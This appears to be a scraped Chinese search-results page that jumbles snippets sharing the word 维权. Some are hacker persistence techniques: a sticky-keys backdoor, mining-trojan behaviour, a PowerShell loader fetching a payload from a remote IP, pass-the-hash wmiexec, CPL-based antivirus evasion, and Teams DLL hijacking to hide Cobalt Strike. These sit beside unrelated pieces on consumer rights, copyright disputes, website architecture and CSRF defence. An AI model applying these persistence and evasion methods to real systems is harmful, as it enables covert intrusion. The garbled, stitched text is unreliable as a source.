Windows维权之粘滞键项维权

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe之后五次shift，成功执行cmd:批处理文件2与批处理文件

从挖矿木马看后渗透维权

No.2 前言 在通过漏洞打入对方服务器后，如果痕迹没有清除干净或者在实施侵入的同时会有防火墙、waf（某云盾）等安全产品发出警报，比如某云服务器会直接发送邮件告知管理员，服务器被一个陌生IP登录，这时管理员可能会警觉 2.释放掉被系统Cache占用的数据：sync && echo 3 >/proc/sys/vm/drop_caches，获得更多计算资源。 这里是矿机的CPU占用情况 ? 阶段2 ps获取运行的进程，grep屏蔽掉自己，然后grep其它挖矿程序，awk获取进程编号，kill -9 强制杀掉。 ? 阶段3 定义一个函数，调用curl，wget远程下载挖矿脚本。 ? 2．系统命令和系统进程被劫持，一旦被劫持的系统进程或命令生效，挖矿木马再次激活。 ? Ubuntu16.04写入定时任务反弹shell 测试环境 攻击机：kali-linux-2019.3，IP：192.168.101.153 靶机：Ubuntu16.04LTS，IP：192.168.101.142 2.

分享一个维权手法

payload function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" #保存维权马的路径 $tmpdir = $env:APPDATA; #vbs路径 $payloadvbsloaderpath = "$tmpdir\_log.vbs" #下载payload get-item $payloadvbsloaderpath -Force $fileObj.Attributes = "Hidden" #新建注册表 $HKCU1 = "HKCU:\" $HKCU2 Software\Microsoft" $HKCU3 = "\Windows NT\Current" $HKCU4 = "Version\Windows" $HKCU = $HKCU1 + $HKCU2

利用机器账户进行域维权

前言 机器账户在许多技术中可以用于提权或横向移动，如使用机器账户的委派进行dcsync，使用机器账户也可进行维权操作。 除了上述作用，使用机器账户也可进行域维权操作。 hash /user:Nayon /password:123456 /domain:attack.local 使用keke申请tgt票据，用于下一步的ptt攻击 tgt::ask /user:Nayon2 图片 Impacket套件wmiexec.py远程链接 python3 wmiexec.py -hash dbf36575210cc5a38ab4050cc6a2e9aa administrator @10.10.10.165 图片 加入高权限用户组用以维权 除去域用户之外，域内机器账户也可以添加到高权限用户组中用以维权。

网络著作侵权成风，维权之路何去何从？

而另一方面，由于网络环境的复杂关系，使得网络作品侵权问题屡见不鲜，著作权人维权之路道阻且长。 12名作者联合上诉，历时2年多才以秦简败诉，小说《庶女有毒》下架而落幕。 为了保护著作权人的合法权益，可以采用以下手段进行维权。 一、和解：如若当事人有自行解决的意向，可以协商处理纠纷问题。 二、调解：当事人可以委托第三方（版权保护协会、律师事务所以及个人等）调解纠纷。

巧用cpl文件维权和免杀

extern "C" __declspec(dllexport) VOID CPlApplet(HWND hwndCPl, UINT msg, LPARAM lParam1, LPARAM lParam2)

红队技术-上线木马自动维权

在攻防中，上线机器总是需要手动进行维权，太过于麻烦，何不直接上线即维权呢，直接放核心代码，当做个记录 https://github.com/capnspacehook/taskmaster package = nil { return } runWinTask(path) } 管理员权限下自动维权，分为自身维权和迁移路径维权版本，已集合至千机免杀一键生成

巧用cpl文件维权和免杀

如何打开cpl 1.双击或者win+r xxx.cpl 2.control <文件名> 3.rundll32 shell32.dll,Control_RunDLL <文件名> 注意：所有rundll32 extern "C" __declspec(dllexport) VOID CPlApplet(HWND hwndCPl, UINT msg, LPARAM lParam1, LPARAM lParam2)

O2O网站

中文名 O2O网站（离线商务网站） 外文名 Online to Offline 网站模式 网站预订、支付，预订、支付信息 应    用 电子商务运营 目录 1 国内网站 2 最受关注 3 网站模式 4 国外网站 ▪ Uber ▪ Hilburn ▪ Getaround ▪ Jetsetter ▪ Airbnb ▪ Zaarly 国内网站 编辑 美团、 拉手、 窝窝团这类传统团购网站，他们的模式既包含了O2O的成分，也包含O2O以外的东西，完全可以称为采用O2O模式运营的网站非常少 O2O（Online To Offline）已经成为电子商务网站的下一个掘金点。 O2O让传统的商业流变成可以数字化的信息流、现金流，将线上和线下的障碍彻底打通，激活了一个巨大的蓝海。 网站模式 编辑 O2O模式要求消费者网站预订、支付，预订、支付信息会成为商家了解消费者购物信息的渠道，方便商家对消费者购买数据的搜集，进而达成区域化精准营销的目的，更好地维护并拓展区域性客户。

大型网站架构系列：电商网站架构案例(2)

电网网站架构案例系列的第二篇文章。主要讲解网站架构分析，网站架构优化，业务拆分，应用集群架构，多级缓存，分布式Session。 拆分后的架构图： 参考部署方案2 （1）如上图每个应用单独部署 （2）核心系统和非核心系统组合部署 6.2应用集群部署（分布式，集群，负载均衡） 分布式部署：将业务拆分后的应用单独部署，应用直接通过RPC （理论上是1:2即可）。 根据业务特性可使用以下缓存过期策略： （1）缓存自动过期； （2）缓存触发过期； 6.4单点登录（分布式Session） 系统分割为多个子系统，独立部署后，不可避免的会遇到会话管理的问题。 流程说明 （1）用户第一次登录时，将会话信息（用户Id和用户信息），比如以用户Id为Key，写入分布式Session； （2）用户再次登录时，获取分布式Session，是否有会话信息，如果没有则调到登录页

是维权还是“违权”？

  //   继“逍遥镇胡辣汤”大批商家因商标侵权相继摘牌后，又一大家熟知的地方特产“荔浦芋”再掀维权风波。 荔浦芋顾名思义，因其产自于广西桂林地区的荔浦县而得名。 那荔浦这次的维权是否会得到法律的支持呢？ 根据《中华人民共和国商标法》第三条规定：经商标局核准注册的商标为注册商标，包括商品商标、服务商标和集体商标、证明商标；商标注册人享有商标专用权，受法律保护。 此案法院审理结果还未可知，我们能做的是加强法律意识和自身的商标品牌保护意识，既要维权又要告诉自己不要“违权”。 现在上腾讯注册商标，价格低至320元，点击左下角“阅读原文”，即可解锁~

基于 Django 的个人网站（2）

, 'view': 'h2', 'title': 'Heading 2', 'class': 'ck-heading_heading2'}, {'model': 'heading3 , 'view': 'h2', 'title': 'Heading 2', 'class': 'ck-heading_heading2'}, {'model': 'heading3 DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>陈志豪的个人网站</title> </head> --suppress HtmlDeprecatedAttribute -->

陈志豪的个人网站

{{ article.abstract }}

{% if is_paginated

利用 Microsoft Teams 维权并掩盖 Cobalt Strike 流量

在这种情况下，下一步是在目标中进行绕过EDR维权并在系统中持续进行攻击。 在探索了几个方法后，我们决定使用DLL劫持来进行绕过EDR来维权，经过分析，一个Microsoft Teams二进制文件被确定为容易受到DLL Hijacking 的攻击。 本文解析了维权和C&C的流量如何绕过EDR，一是利用DLL劫持进行维权，然后详细介绍了在使用 Cobalt Strike C2 配置文件与 C&C 通信时如何模拟合法的 Microsoft Teams 经过分析我们认为此可执行文件是在目标中进行维权的理想方法： 它是一个应用程序更新管理器 ( Squirrel )， 存在于多个产品安装中（Teams、Slack、Discord、Webex）。

DLL代理加载shellcod用于免杀，维权等等

根据我们的战术我们要如何绕过Defense 这里分享一个我的方法： 我的典型方法是前往Ninite这样的网站，从常见的软件供应商那里下载一些应用程序，然后开始在安装目录中四处浏览。

锤子员工被变相强制离职，他们要找罗永浩维权

“所以这基本上等于强制离职，大部分人都没办法签了，但也有一部分人打算维权”。 ? 他也迫于无奈选择了转签合同，当天就办理了入职字节跳动，工作地点不变。 以下为该员工自述节选（略有编辑）： 遭遇变相强制离职 有员工打算维权 ? 也听说有些人打算维权，但如果签了就没什么好维权的了，毕竟从协议看是主动离职。 TNT加速了锤子科技倒下 ?

“元宇宙”维权第一股！中青宝投资者维权征集已开启 投资者可索赔

从1月18日至今中青宝股价累计跌幅达35％，据维权律师分析，该案已经具备维权条件，符合日期要求的投资者均可报名向上市公司索赔。 孔聪律师认为报名维权的条件为：在2022年1月11日到2022年1月18日之间曾买入中青宝300052股票，且在2022年1月18日收盘仍有持股的用户可报名参与此次维权。

从11万条消费维权数据中，我们发现了什么？

对工商部门而言，每一年都会积累大量来自消费者的投诉维权数据。如何才能更有效地对这些数据进行分析处理、进而更好地服务于消费者呢？ ▍用数据分析来辅助工商部门搞定“痛点” 在生活中，如果大家有过消费维权经历，应该知道可以拨打12315或者12345市民热线向工商局进行举报。 而对工商部门来说，维权、投诉这块累积的数据量还是挺大的。 仅以上海市为例，工商部门2016年承办的12315投诉总量就有11.2万条，且每年以30%速度增长。 2. 累积的大量投诉案例数据，需要进行文本深入挖掘分析，达到精准监管目的。 3. 投诉量上升趋势明显，工作量大，需要提供智能辅助工具降低人工管理压力。 4. （图片说明：数决科技团队“消费维权大数据智能管理平台”新业务流程图） 文本数据可视化只是为了数据的展示，帮助我们了解现状是什么、问题在哪里？

熊掌号原创保护新保障：版权保护维权功能

维权的内容属于百度搜索结果内； 2. 维权内容为原创资源； 二、 维权标准： 1. 支持单个对多个侵权内容的维权； 2. 需要提供被侵权内容的原创首发证明及材料； 3. 提供侵权内容的侵权详细说明； 三、维权流程： 维权流程：具体操作流程详见 《维权服务使用指南》 疑似侵权线索发掘→选择要申请初审的内容→初审成功发起维权→签署维权协议–线索审核–通过审核–补充权属材料– 启动维权–维权进度查看–维权成功 四、 处理结果： 1. 维权失败： （1）初审失败，无法再进行下一步维权申请操作 （2）审核不通过 2. 维权成功： （1）审核通过，侵权内容下架 （2）审核通过，侵权内容下架+获得经济赔偿。 ） 今天出门面试，路上就看到百度群里在讨论这个，登录了熊掌号看了一下，就随手点击了去初审，结果都失败了，原因是侵权地址为个人网站，这就很尴尬了 另外一个是侵权网站无ICP备案，举报的是新浪博客，百度给出的解释是个人发到新浪博客的

koa2实现网站csrf防御

先说常见的登陆鉴权： 用户在你的网站登陆后，一般把登陆凭证（token）存储在cookie里，之后每次调接口都会自动携带，后端根据这条cookie鉴权，判定是登陆状态，进而允许进行安全操作。 ，请求时，需要先进行csrf比对，取出request请求头里的csrfToken和自己session里的csrfToken进行比对，完全一致才放行 代码实现 前端（react） 1//App.tsx 2/ cookie.get("csrf_token")) { 5 request("/all/getCsrfToken"); 6 } 7 }, []); 1//request.ts 2//axios 后端利用koa-csrf中间件实现 1yarn add koa-csrf 1、先封装一个csrf实例 1//先封装一个csrf实例 2const CSRF = require("koa-csrf"); 2、写一个给前端种植csrfToken的接口（必须是get） 1const Csrf = require("@utils/csrf"); 2 3router.get("/getCsrfToken", Csrf

百度熊掌号原创保护维权服务功能初体验

前段时候就发过一篇关于熊掌号原创保护新保障：版权保护维权功能，出来的时候看了一下侵权我的一部分网站，基本都是个人网站，这个是不太好处理的 最近发现有企业网站复制粘贴我的原创文章，把握机会，试试这个维权服务 ，手动滑稽 点了初审以后也没太在意，今天才发现初审通过了，就开始下一步 初审成功，点击“去维权” 后，申请维权服务 初审通过以后，你访问维权详情页是直接看不到的，但是旁边有个维权内容，要点这个才能看到你可以维权的信息 点击“去维权”，就会跳转到百度的版权卫士页面 就会看到线索ID和原文标题以及侵权页面的地址 在左上角首先选择维权内容类型“图片”或者“文字”，其次，“请选择维权机构”处，选择希望委托的维权机构 图片的维权机构好像是图盾 然后在页面中央勾选希望维权的侵权线索，点击“提交”，正式发起维权 第一次提交会让你签署维权协议，填一下自己的真实姓名、身份证号、手机号和地址，点击同意即可 提交以后可以查看维权状态。 →签署维权协议–线索审核–通过审核–补充权属材料–启动维权–维权进度查看–维权成功 我才走到第五步，后续通过审核还要补充权属材料等步骤 维权失败那就凉凉了，成功的话就继续分享一下 想说的还是多写原创最好